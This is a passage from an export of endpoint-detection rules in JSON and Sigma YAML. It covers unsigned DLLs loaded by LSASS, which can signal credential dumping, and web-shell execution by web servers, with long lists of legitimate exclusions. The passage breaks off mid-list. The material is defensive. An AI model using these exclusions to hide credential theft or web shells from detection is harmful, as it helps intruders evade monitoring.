exclusion_vaultcds:\n # C:\\Windows\\System32\\VaultCDS.dll / 9faf8160fb8b8bd01ffaddf96d1cd2f5199cf4de7a77b9e662dd9c02c8475309\n ImageLoaded: '?:\\Windows\\System32\\VaultCDS.dll'\n Description: 'Vault CDS'\n exclusion_efssvc:\n # c:\\Windows\\System32\\efssvc.dll / 2b96e1724e7783b7ac8f9c17f25d31735c75f6cb9c26e3e7d9a2493ea1952f8b\n ImageLoaded: '?:\\Windows\\System32\\efssvc.dll'\n Description: 'EFS Service'\n exclusion_mskeyprotect:\n ImageLoaded: '?:\\Windows\\System32\\mskeyprotect.dll'\n Description: 'Microsoft Key Protection Provider'\n exclusion_ncryptprov:\n ImageLoaded: '?:\\Windows\\System32\\ncryptprov.dll'\n Description: 'Microsoft KSP'\n exclusion_secur32:\n ImageLoaded: '?:\\Windows\\System32\\secur32.dll'\n Company: 'Microsoft Corporation'\n Description: 'Security Support Provider Interface'\n exclusion_cloudstore:\n ImageLoaded: '?:\\Windows\\System32\\Windows.CloudStore.dll'\n Company: 'Microsoft Corporation'\n Description: 'Cloud Data Store'\n exclusion_cryptngc:\n ImageLoaded: '?:\\Windows\\System32\\cryptngc.dll'\n Company: 'Microsoft Corporation'\n Description: 'Microsoft Passport API'\n exclusion_mcafee:\n ImageLoaded: '?:\\Program Files\\McAfee\\Endpoint Encryption\\MfeCryptoAdapter64.dll'\n Company: 'McAfee, LLC'\n Description: 'McAfee Drive Encryption Cryptographic Adapter Module'\n exclusion_broadcom:\n ImageLoaded: '?:\\Windows\\System32\\BCMLogon.dll'\n Company:\n - 'Broadcom Corporation'\n - 'Dell Inc.'\n Description: 'Wireless Network Logon Provider'\n\n exclusion_chambersign:\n ImageLoaded:\n - '?:\\Program Files\\ChamberSign\\HashLogic\\bin\\idoCardModule.dll'\n - '?:\\Program Files\\ChamberSign\\HashLogic\\bin\\IAScs.dll'\n - '?:\\Program Files\\ChamberSign\\HashLogic\\bin\\idoCrypto.dll'\n - '?:\\Program Files\\ChamberSign\\HashLogic\\bin\\idoLog.dll'\n\n exclusion_smartcardmiddleware:\n ImageLoaded:\n - '?:\\Program Files\\Smart Card Middleware\\bin\\idoCrypto.dll'\n - '?:\\Program Files\\Smart Card Middleware\\bin\\IAS.dll'\n - '?:\\Program Files\\Smart Card Middleware\\bin\\MD.dll'\n - '?:\\Program Files\\Smart Card Middleware\\bin\\idoLog.dll'\n - '?:\\Program Files\\Smart Card Middleware\\bin\\idoCardModule.dll'\n\n exclusion_dsparse:\n ImageLoaded: '?:\\Windows\\System32\\dsparse.dll'\n Company: 'Microsoft Corporation'\n Description: 'Active Directory Domain Services API'\n\n exclusion_fwpuclnt:\n ImageLoaded: '?:\\Windows\\System32\\FWPUCLNT.DLL'\n Company: 'Microsoft Corporation'\n Description: 'FWP/IPsec User-Mode API'\n\n exclusion_rasadhlp:\n ImageLoaded: '?:\\Windows\\System32\\rasadhlp.dll'\n Company: 'Microsoft Corporation'\n Description: 'Remote Access AutoDial Helper'\n\n exclusion_keyiso:\n ImageLoaded: '?:\\Windows\\System32\\keyiso.dll'\n Company: 'Microsoft Corporation'\n Description: 'CNG Key Isolation Service'\n\n exclusion_efsext:\n ImageLoaded: '?:\\Windows\\System32\\efsext.dll'\n Company: 'Microsoft Corporation'\n Description: 'EFSEXT.DLL'\n\n exclusion_novell:\n ImageLoaded:\n # SHA256: f82cd42cb1cc6d8ad7a3040b9035fb1cc1014d394831eaddb8fa17501c76084d\n - '?:\\Program Files\\Novell\\CASA\\Bin\\lcredmgr.dll'\n # SHA256: 56ff7f9823c005b06892f382a623e0f6c8fba69198294d3ea0c0cb8efc4d2aa0\n - '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\ZenCredManager.dll'\n\n exclusion_dhcpcsvc:\n # SHA256: 691a7aff42d558fac26f2a9de6b47d7596b130e730597dc3aff6025cb484d4a1\n # File version: 10.0.19041.546 (WinBuild.160101.0800)\n ImageLoaded: '?:\\Windows\\System32\\dhcpcsvc.dll'\n Company: 'Microsoft Corporation'\n Description: 'DHCP Client Service'\n\n exclusion_bit4:\n # SHA256: 2b0d877e6d81cfea0fc9d9a238e5c9f70e2d972ab8fdd6602feb0ddcb0d1c5d3\n ImageLoaded: '?:\\Windows\\System32\\bit4upki-store.dll'\n Company: 'bit4id srl'\n Description: 'csp-certstore Dynamic Link Library'\n\n exclusion_docker:\n # C:\\ProgramData\\docker\\windowsfilter\\2337d416d51a27c0f2d246b6fc5509813cdf743e237675dc1c10389d1e811ea0\\Files\\Windows\\System32\\schannel.dll\n # C:\\ProgramData\\docker\\windowsfilter\\2337d416d51a27c0f2d246b6fc5509813cdf743e237675dc1c10389d1e811ea0\\Files\\Windows\\System32\\efslsaext.dll\n ImageLoaded|startswith:\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\'\n - '*\\docker\\data\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n - '*\\docker\\data\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\'\n\n exclusion_ktmw32:\n # SHA256: 61c3bd3f278ea73886c0a0beae617469485af77945c670f492b07136ac079b1e\n # File version: 10.0.17763.1 (WinBuild.160101.0800)\n ImageLoaded: '?:\\Windows\\System32\\ktmw32.dll'\n Company: 'Microsoft Corporation'\n Description: 'Windows KTM Win32 Client DLL'\n\n exclusion_vaultcli:\n # SHA256: 958b36962aa44458fbf7f5e5ba4f7318d59cdbe823c24969962573c8afdf2db3\n # File version: 10.0.19041.1 (WinBuild.160101.0800)\n ImageLoaded: '?:\\Windows\\System32\\vaultcli.dll'\n Company: 'Microsoft Corporation'\n Description: 'Credential Vault Client Library'\n\n exclusion_usermgrproxy:\n # SHA256: 68eb46851a1c0bbb65ebc20f2cfb22088afefcb5bb25a2d89acbd9c01600f199\n # File version: 10.0.19041.1 (WinBuild.160101.0800)\n ImageLoaded: '?:\\Windows\\System32\\UserMgrProxy.dll'\n Company: 'Microsoft Corporation'\n Description: 'UserMgrProxy'\n\n exclusion_urlmon:\n # SHA256: 68eb46851a1c0bbb65ebc20f2cfb22088afefcb5bb25a2d89acbd9c01600f199\n # File version: 11.00.19041.1 (WinBuild.160101.0800)\n ImageLoaded: '?:\\Windows\\System32\\urlmon.dll'\n Company: 'Microsoft Corporation'\n Description: 'OLE32 Extensions for Win32'\n\n exclusion_oberthur:\n # SHA256: 130edbb63d52004cd25cefb0dfdb8efd113f72cd42f8a9cd7a3577a12fbb0c84\n ImageLoaded: '?:\\Program Files\\Oberthur Technologies\\AWP\\DLLs\\OcsCsp.dll'\n Company: 'Oberthur Technologies'\n Description: 'OCS Cryptographic Service Provider'\n OriginalFileName: 'OCSCsp.dll'\n\n exclusion_ibm_npnotes:\n # SHA256: b02cd69fd6b2f7ae6e5d3f7f2fef3603efa59bdecc0fe3a708550c8b16c2a9c2\n ImageLoaded|endswith: '\\npnotes64.dll'\n Company: 'IBM Corporation'\n Description: 'Notes Network Provider'\n OriginalFileName: 'npnotes'\n\n exclusion_authz:\n # SHA256: 4e4ef8c31583ece0a3b8ed92ff5cc9d04d6ceaf90fa00cdb8adee3808a835bdb\n # File version: 10.0.19041.1 (WinBuild.160101.0800)\n ImageLoaded: '?:\\Windows\\System32\\authz.dll'\n Company: 'Microsoft Corporation'\n Description: 'Authorization Framework'\n\n exclusion_kmkd:\n # SHA256: 2e68f8e34cf846bbdb3b752eb25a982c1a5b7e161ceebd6714ffbba14a43f2be\n # File version: 10.0.14393.3024 (rs1_release.190530-2002)\n ImageLoaded: '?:\\Windows\\System32\\kmkd.dll'\n Company: 'Microsoft Corporation'\n Description: 'Windows HMAC Key Derivation API'\n\n exclusion_wshqos:\n # SHA256: 5c743290c03f259b536d0f24da5b7020863de913ab55b6c5d845803d1c5242bb\n # File version: 6.1.7601.24000 (win7sp1_ldr.171231-1547)\n ImageLoaded: '?:\\Windows\\System32\\wshqos.dll'\n Company: 'Microsoft Corporation'\n Description: 'QoS Winsock2 Helper DLL'\n\n exclusion_winbrand:\n # SHA256: 19959d18601712901f03b83150d15e34ebcab355bb4692c9a28511a72f57fc66\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\winbrand.dll'\n Company: 'Microsoft Corporation'\n Description: 'Windows Branding Resources'\n\n exclusion_morpho:\n # SHA256: 601f5bd444f3498a79ae51a0097ae0361490cc1128db0a050f59a52cfc8f1b08\n ImageLoaded: '?:\\Windows\\System32\\RCnfCSP64.dll'\n Company: 'Morpho e-Documents'\n Description: 'Morpho Removable Token Cryptographic Provider'\n OriginalFileName: 'RCnfCSP64.dll'\n\n exclusion_ecc:\n ImageLoaded: '?:\\Program FIles\\IAS ECC Middleware\\Bin\\\\*'\n Company: 'Gemalto'\n\n exclusion_wkscli:\n # SHA256: 6fd0dc73dbe7519e2c643554c2a7f8fbe4f9a678c4241bb54b3c6e65d2abcf3a\n # File version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n ImageLoaded: '?:\\Windows\\System32\\wkscli.dll'\n Company: 'Microsoft Corporation'\n Description: 'Workstation Service Client DLL'\n OriginalFileName: 'WKSCLI.DLL'\n\n exclusion_dsrole:\n # SHA256: 73566223914bf670df6b5931fa213e546713531b10391ed65b5256bbd7abde7f\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\dsrole.dll'\n Company: 'Microsoft Corporation'\n Description: 'DS Role Client DLL'\n OriginalFileName: 'DSROLE.DLL'\n\n exclusion_netapi32:\n # SHA256: 335acb68c2875c5ec7412af3316212f3470cf3b1a46168115777f60341a390a4\n # File version: 6.1.7601.23403 (win7sp1_ldr.160325-0600)\n ImageLoaded: '?:\\Windows\\System32\\netapi32.dll'\n Company: 'Microsoft Corporation'\n Description: 'Net Win32 API DLL'\n OriginalFileName: 'NetApi32.DLL'\n\n exclusion_shlwapi:\n # SHA256: 257220b2e13a535bea8b05289a1e615a1d1c958445c2a0f8ded40e45da7a5d9f\n # File version: 6.1.7601.23403 (win7sp1_ldr.160325-0600)\n ImageLoaded: '?:\\Windows\\System32\\shlwapi.dll'\n Company: 'Microsoft Corporation'\n Description: 'Shell Light-weight Utility Library'\n OriginalFileName: 'SHLWAPI.DLL'\n\n exclusion_netutils:\n # SHA256: 127506d1db38275614cbeb047c133718ef9d03266ba9c98be55ec7847cfc9c3d\n # File version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n ImageLoaded: '?:\\Windows\\System32\\netutils.dll'\n Company: 'Microsoft Corporation'\n Description: 'Net Win32 API Helpers DLL'\n OriginalFileName: 'NETUTILS.DLL'\n\n exclusion_apphelp:\n # SHA256: a1afd2fd6da5968f6d83733c98d301c82ba33988d28ebfcf2f50eb3b40ef5611\n # File version: 6.1.7601.19050 (win7sp1_gdr.151029-0600)\n ImageLoaded: '?:\\Windows\\System32\\apphelp.dll'\n Company: 'Microsoft Corporation'\n Description: 'Application Compatibility Client Library'\n OriginalFileName: 'Apphelp'\n\n exclusion_iphlpapi:\n # SHA256: a656353c50ee08422145d00db9cfd9f6d3e664753b3c454b171e2a56a8aa94dc\n # File version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n ImageLoaded: '?:\\Windows\\System32\\IPHLPAPI.DLL'\n Company: 'Microsoft Corporation'\n Description: 'IP Helper API'\n OriginalFileName: 'iphlpapi.dll'\n\n exclusion_slc:\n # SHA256: 90a88986c8c5f30fb153ec803feda6572b2c2630a6c9578fcc017800692694d5\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\slc.dll'\n Company: 'Microsoft Corporation'\n Description: 'Software Licensing Client Dll'\n OriginalFileName: 'slcdll.dll'\n\n exclusion_winhttp:\n # SHA256: 52c33c1f6e18465733da0f410a8ce85a17517e66292bd01ff3ae42a142500eaa\n # File version: 6.1.7601.24000 (win7sp1_ldr.171231-1547)\n ImageLoaded: '?:\\Windows\\System32\\winhttp.dll'\n Company: 'Microsoft Corporation'\n Description: 'Windows HTTP Services'\n OriginalFileName: 'winhttp.dll'\n\n exclusion_wldap32:\n # SHA256: 4fb4a459bc00ff1b8bd80d96e3031997dbf052efb29614ce4c212570fe205c38\n # File version: 6.1.7601.23889 (win7sp1_ldr.170810-1615)\n ImageLoaded: '?:\\Windows\\System32\\Wldap32.dll'\n Company: 'Microsoft Corporation'\n Description: 'Win32 LDAP API DLL'\n OriginalFileName: 'WLDAP32.dll'\n\n exclusion_wshtcpip:\n # SHA256: b2025742b5f0025ace9821d5722de3f997eeeab21d2f381c9e307882df422579\n # File version: 6.1.7601.23889 (win7sp1_ldr.170810-1615)\n ImageLoaded: '?:\\Windows\\System32\\wshtcpip.dll'\n Company: 'Microsoft Corporation'\n Description: 'Winsock2 Helper DLL (TL/IPv4)'\n OriginalFileName: 'wshtcpip.dll'\n\n exclusion_winnsi:\n # SHA256: 5d487e311401138ece73c734dda7b4f8d9d9058bb9e03589cf796652214c47c4\n # File version: 6.1.7601.23889 (win7sp1_ldr.170810-1615)\n ImageLoaded: '?:\\Windows\\System32\\winnsi.dll'\n Company: 'Microsoft Corporation'\n Description: 'Network Store Information RPC interface'\n OriginalFileName: 'winnsi.dll'\n\n exclusion_psbase:\n # SHA256: 59d7c2a5097f83e8d07caafcf9c6f9c6849af24c28047fd4d4d6b5673ee8d089\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\psbase.dll'\n Company: 'Microsoft Corporation'\n Description: 'Protected Storage default provider'\n OriginalFileName: 'psbase.dll'\n\n exclusion_cfgmgr32:\n # SHA256: 00a09caf9129e84feea98fa03ce9012c9f961b64fee15c4f268822c0f82acc3c\n # File version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n ImageLoaded: '?:\\Windows\\System32\\cfgmgr32.dll'\n Company: 'Microsoft Corporation'\n Description: 'Configuration Manager DLL'\n OriginalFileName: 'cfgmgr32.dll'\n\n exclusion_ole32:\n # SHA256: 0d2d416279c2e0c80dc1740b5ee0f2df4484c13eed8ddf798af4e705d5373bc9\n # File version: 6.1.7601.24537 (win7sp1_ldr_escrow.191114-1547)\n ImageLoaded: '?:\\Windows\\System32\\ole32.dll'\n Company: 'Microsoft Corporation'\n Description: 'Microsoft OLE for Windows'\n OriginalFileName: 'OLE32.dll'\n\n exclusion_gpapi:\n # SHA256: 82ebeb5ddd3d2e8d8877b5645868df8e2f0b07e6ce943d36cef05205905ae835\n # File version: 6.1.7601.23452 (win7sp1_ldr.160512-0600)\n ImageLoaded: '?:\\Windows\\System32\\gpapi.dll'\n Company: 'Microsoft Corporation'\n Description: 'Group Policy Client API'\n OriginalFileName: 'gpapi.dll'\n\n exclusion_pstorsvc:\n # SHA256: 37c890abcac01f610f00e900a59b08cf4f17bfc49459eebf0058efe02fd628ee\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\pstorsvc.dll'\n Company: 'Microsoft Corporation'\n Description: 'Protected storage server'\n OriginalFileName: 'Protected storage server'\n\n exclusion_setupapi:\n # SHA256: 12130837d7f89a2c7e9d25747a8e5b9001e0a38d545178b49b450c23ae62664a\n # File version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n ImageLoaded: '?:\\Windows\\System32\\SETUPAPI.dll'\n Company: 'Microsoft Corporation'\n Description: 'Windows Setup API'\n OriginalFileName: 'SETUPAPI.dll'\n\n exclusion_devrtl:\n # SHA256: 63c58551f32b0b09377f64a6ae1fa81af93b8a707a57a8c18722086906ad3046\n # File version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n ImageLoaded: '?:\\Windows\\System32\\DEVRTL.dll'\n Company: 'Microsoft Corporation'\n Description: 'Device Management Run Time Library'\n OriginalFileName: 'DEVRTL.dll'\n\n exclusion_devobj:\n # SHA256: c5e61b11ddbbbbba3d9488970524f0975ea5fbdf16e2fa31f579f8bfa48353b1\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\devobj.dll'\n Company: 'Microsoft Corporation'\n Description: 'Device Information Set DLL'\n OriginalFileName: 'devinfoset.dll'\n\n exclusion_samlib:\n # SHA256: d1e9a67772108fff9083e31ed8ce8a8805ad43465ad4a21b93bc86045212c813\n # File version: 6.1.7601.23677 (win7sp1_ldr.170209-0600)\n ImageLoaded: '?:\\Windows\\System32\\samlib.dll'\n Company: 'Microsoft Corporation'\n Description: 'SAM Library DLL'\n OriginalFileName: 'SAMLib.dll'\n\n exclusion_sensapi:\n # SHA256: 3f9d4ee64e4210340c6fee0de81bfe3c613ddbe608ec09d63817d24ce24bfc5e\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\SensApi.dll'\n Company: 'Microsoft Corporation'\n Description: 'SENS Connectivity API DLL'\n OriginalFileName: 'SensApi.dll'\n\n exclusion_mpr:\n # SHA256: 0f7a80db821fde6580e9481b6da44844f717ddb4983b0e3d562be43726153951\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\mpr.dll'\n Company: 'Microsoft Corporation'\n Description: 'Multiple Provider Router DLL'\n OriginalFileName: 'mpr.dll'\n\n exclusion_qagentrt:\n # SHA256: bd540499f74e8f59a020d935d18e36a3a97c1a6ec59c8208436469a31b16b260\n # File version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n ImageLoaded: '?:\\Windows\\System32\\QAgentRT.dll'\n Company: 'Microsoft Corporation'\n Description: 'Quarantine Agent Service Run-Time'\n OriginalFileName: 'QAgentRT.dll'\n\n exclusion_ntmarta:\n # SHA256: 184547fac0c3d7148faa3f601929a7089de393bd19929a137dad743331dd3f77\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\ntmarta.dll'\n Company: 'Microsoft Corporation'\n Description: 'Windows NT MARTA provider'\n OriginalFileName: 'ntmarta.dll'\n\n exclusion_fveui:\n # SHA256: 2dfbd792b68f3ebef0843183cae5d52b6fa04163808afacf6c0d738455898c36\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\fveui.dll'\n Company: 'Microsoft Corporation'\n Description: 'BitLocker Drive Encryption UI'\n OriginalFileName: 'FVEUI.dll'\n\n exclusion_p2pcollab:\n # SHA256: 1158011e4a1298dec79133b40888aa87b06f5b64ba2ab461b58c22f5f9211d0c\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\p2pcollab.dll'\n Company: 'Microsoft Corporation'\n Description: 'Peer-to-Peer Collaboration'\n OriginalFileName: 'p2pcollab.dll'\n\n exclusion_ncryptsslp:\n # SHA256: 593f8a8cf0cceb342b4eb1fe70afaab69524406ec10242167591deb803dc1f5e\n # File version: 6.3.9600.20618 (winblue_ltsb_escrow.220916-1725)\n ImageLoaded: '?:\\Windows\\System32\\ncryptsslp.dll'\n Company: 'Microsoft Corporation'\n Description: 'Microsoft SChannel Provider'\n OriginalFileName: 'ncryptsslp.dll'\n\n exclusion_wuaueng:\n # SHA256: 6a8a714de3cd39c8a02654db6c9c7184658f5b37a065a18a1f697d280b764600\n # File version: 7.6.7601.24436 (win7sp1_ldr.190409-0600)\n ImageLoaded: '?:\\Windows\\System32\\wuaueng.dll'\n Company: 'Microsoft Corporation'\n Description: 'Windows Update Agent'\n OriginalFileName: 'wuaueng.dll'\n\n exclusion_edpauditapi:\n # SHA256: 2a7a66afd6d3853fa3b3c19daf67d1064a2183f5040cb1a1a1d4150225d8920f\n # File version: 10.0.19041.1 (WinBuild.160101.0800)\n ImageLoaded: '?:\\Windows\\System32\\edpauditapi.dll'\n Company: 'Microsoft Corporation'\n Description: 'edpauditapi.dll'\n OriginalFileName: 'wuaueng.dll'\n\n exclusion_gip_cps:\n ImageLoaded: '?:\\Program Files\\GIP-CPS\\CPSRev.dll'\n\n exclusion_apple_bonjour_mdns:\n ImageLoaded: '?:\\Program Files\\Bonjour\\mdnsNSP.dll'\n Company: 'Apple Inc.'\n Description: 'Bonjour Namespace Provider'\n\n exclusion_gemalto:\n ImageLoaded:\n - '?:\\Program Files\\Gemalto\\Classic Client\\BIN\\\\*'\n - '?:\\Program Files\\Gemalto\\Common\\Resources\\LocHub.dll'\n Company:\n - 'Gemalto'\n - 'GemSafe'\n\n exclusion_enovacom:\n ImageLoaded: '?:\\Program Files\\Enovacom\\eSSO\\bin\\esso_rp.dll'\n Company: 'Enovacom'\n\n exclusion_vmware:\n ImageLoaded: '?:\\Windows\\System32\\VMWSU_V1_0.DLL'\n Company: 'VMware, Inc.'\n Description: 'VMware SU Authentication Provider'\n OriginalFileName: 'VMWSU_V1_0.DLL'\n\n exclusion_wshhyperv:\n # SHA256: 8ba848ac78e408b577f702cc70794b5aae03ddc1ca2fe003add905f91a60efc0\n # File version: 10.0.14393.2969 (rs1_release.190503-1820)\n ImageLoaded: '?:\\Windows\\System32\\wshhyperv.dll'\n Company: 'Microsoft Corporation'\n Description: 'Hyper-V Winsock2 Helper DLL'\n OriginalFileName: 'wshhyperv.dll'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cb289a71-4836-4f9d-b12c-c0582903d497",
"rule_name": "Unsigned DLL Loaded by LSASS",
"rule_description": "Detects when an unsigned DLL or EXE is loaded by the LSASS process.\nAttackers may try to load DLLs in LSASS as an attempt to dump credentials off the memory.\nThis could also be a legitimate third party DLL addin features to the machine authentication mechanism.\nIt is recommended to identify the unsigned DLL to determine its maliciousness and document legitimate third party DLLs.\n",
"rule_creation_date": "2020-09-30",
"rule_modified_date": "2026-02-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cb325077-7493-4f82-9b3f-208764d322eb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623245Z",
"creation_date": "2026-03-23T11:45:34.623247Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623252Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/20/g/ensiko--a-webshell-with-ransomware-capabilities.html",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/authentication-and-encryption-in-pas-web-shell-variant/",
"https://attack.mitre.org/techniques/T1203/",
"https://attack.mitre.org/techniques/T1505/003/",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "t1203_web_shell.yml",
"content": "title: Possible Web Shell Execution\nid: cb325077-7493-4f82-9b3f-208764d322eb\ndescription: |\n Detects the execution of a suspicious shell process by a common web server software likely related to a web shell or a command injection via a vulnerable application.\n Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.\n Adversaries may also backdoor web servers with web shells to establish persistent access to systems.\n It is recommended to analyze the command-line as well as to correlate this alert with other commands executed around it from the web server to determine their legitimacy.\nreferences:\n - https://www.trendmicro.com/en_us/research/20/g/ensiko--a-webshell-with-ransomware-capabilities.html\n - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/authentication-and-encryption-in-pas-web-shell-variant/\n - https://attack.mitre.org/techniques/T1203/\n - https://attack.mitre.org/techniques/T1505/003/\n - https://attack.mitre.org/techniques/T1190/\ndate: 2021/09/17\nmodified: 2026/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - attack.persistence\n - attack.t1505.003\n - attack.initial_access\n - attack.t1190\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.InitialAccess\n - classification.Linux.Behavior.Exploitation\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_parent_standard:\n ParentImage|endswith:\n - '/apache2'\n - '/httpd'\n - '/nginx'\n - '/php-fpm'\n User:\n - 'root'\n - 'apache'\n - 'nginx'\n - 'www-data'\n - 'http'\n\n selection_parent_php_fpm:\n # NOTE: On Ubuntu, php-fpm have its version as a suffix...\n ParentImage: '*php-fpm*'\n User:\n - 'root'\n - 'www-data'\n - 'php-fpm'\n # On CentOS, default user of php-fpm is apache but it can be changed by sysadmins to nginx. Handle both case.\n - 'apache'\n - 'nginx'\n\n selection_shell_execution:\n CommandLine|contains: '-c'\n Image|endswith:\n - '/sh'\n - '/bash'\n - '/dash'\n - '/zsh'\n\n exclusion_system_utilities_with_args:\n CommandLine|startswith:\n - 'sh -c echo '\n - 'sh -c ps '\n - 'sh -c gs '\n - 'sh -c uname '\n - 'sh -c which '\n - 'sh -c sed '\n - 'sh -c sendmail '\n - 'sh -c /sbin/ldconfig'\n - 'sh -c /usr/sbin/sendmail '\n - 'sc -c /usr/lib/sendmail '\n - 'sh -c /usr/bin/unzip '\n - 'sh -c date '\n - 'sh -c exec date '\n - 'sh -c command -v '\n - 'sh -c 7za '\n - 'sh -c unrar '\n - 'sh -c rar '\n - 'sh -c unzip '\n - 'sh -c zip '\n - 'sh -c xz '\n - 'sh -c bzip2 '\n - 'sh -c gzip '\n - 'sh -c tar '\n - 'sh -c sf '\n - 'sh -c file '\n - 'sh -c hostname '\n - 'sh -c unoconv '\n - 'sh -c exec /bin/hostname '\n - 'sh -c /bin/ping -c 1 -W 1 '\n - 'sh -c ping -c 1 -w 1'\n - 'sh -c ping -c 1 -w 2'\n - 'sh -c sudo quota -u '\n - 'sh -c realpath ~'\n - 'sh -c ionice -c '\n - 'sh -c pdftotext '\n\n exclusion_system_utilities_no_args:\n CommandLine:\n - 'sh -c uname'\n - 'sh -c date'\n - 'sh -c exec date'\n - 'sh -c hostname'\n - 'sh -c exec /bin/hostname'\n\n exclusion_version:\n CommandLine:\n - 'sh -c * -version'\n - 'sh -c * --version'\n\n exclusion_monitoring:\n CommandLine|startswith:\n - 'sh -c /home/*/phpinfoserv'\n - 'sh -c /home/*/phpexec'\n - 'get delivery schedules'\n - 'get trigger detail'\n - 'get sessions'\n - 'sh -c stat'\n - 'sh -c /usr/bin/msmtp'\n - 'sh -c cat /proc/uptime'\n - 'sh -c ?cat? ?/proc/cpuinfo?'\n - 'sh -c cat /proc/meminfo'\n - 'sh -c ?awk? ?/MemTotal/ {print $2}? ?/proc/meminfo?'\n - 'sh -c ?awk? ?/SwapTotal/ {print $2}? ?/proc/meminfo?'\n\n exclusion_version_checks:\n CommandLine:\n - 'sh -c ghostscript -v'\n - 'sh -c libreoffice --version'\n - 'sh -c java --version'\n - 'sh -c identify --version'\n - 'sh -c HandBrakeCLI --version 2>&1'\n - 'sh -c apachectl -V'\n - 'sh -c pdfinfo -v 2>&1'\n\n exclusion_custom_tools:\n CommandLine|startswith:\n - 'sh -c /data/'\n - 'sh -c /opt/'\n\n # Unfortunately it is very common for webapps to enumerate the available interfaces or ip addresses\n exclusion_address_enumeration:\n CommandLine|startswith:\n - 'sh -c /bin/cat /sys/class/net/*/address'\n - 'sh -c /sbin/ip -? addr'\n - 'sh -c for * in * /sys/class/net/*/address'\n\n exclusion_timedatectl:\n CommandLine|startswith:\n - 'sh -c timedatectl status'\n - 'sh -c lc_all=c timedatectl status'\n\n exclusion_gpgconf_kill:\n CommandLine|startswith: 'sh -c /usr/bin/gpgconf --kill gpg-agent'\n\n exclusion_supervisorctl:\n CommandLine|startswith: 'sh -c supervisorctl status '\n\n exclusion_centreon:\n - CommandLine:\n - 'sh -c /usr/bin/rrdtool -'\n - 'sh -c /usr/bin/rrdtool - ' # 1 space at the end\n - 'sh -c sudo service cbd reload'\n\n # sh -c '/usr/sbin/centengine' -v /var/cache/centreon/config/engine/'37'/centengine.DEBUG 2>&1\n - CommandLine|startswith:\n - \"sh -c '/usr/sbin/centengine' \"\n - 'sh -c /usr/sbin/centengine '\n\n exclusion_nagios:\n - CommandLine:\n - 'sh -c /usr/bin/rrdtool fetch /usr/local/nagios/share/perfdata/*'\n - 'sh -c rrdtool xport --step *'\n - CommandLine|startswith:\n - 'sh -c /usr/local/nagiosxi/'\n - 'sh -c /usr/lib64/nagios/'\n\n exclusion_cacti:\n CommandLine:\n - 'sh -c /usr/bin/rrdtool graph -*'\n - 'sh -c /usr/bin/rrdtool info *'\n - 'sh -c /usr/bin/php plugins/realtime/poller_rt.php *'\n - 'sh -c pidof -o $$ -o %PPID -x ged'\n - 'sh -c /usr/bin/rrdtool -v 2>&1'\n - \"sh -c /usr/bin/php -q '/usr/share/cacti/install/cli_test.php' *\"\n - \"sh -c /usr/bin/php -q '/usr/share/cacti/install/cli_check.php' extensions\"\n - 'sh -c nproc'\n - 'sh -c /usr/bin/snmpbulkwalk -O QnU -c *'\n - 'sh -c /usr/bin/snmpget -V 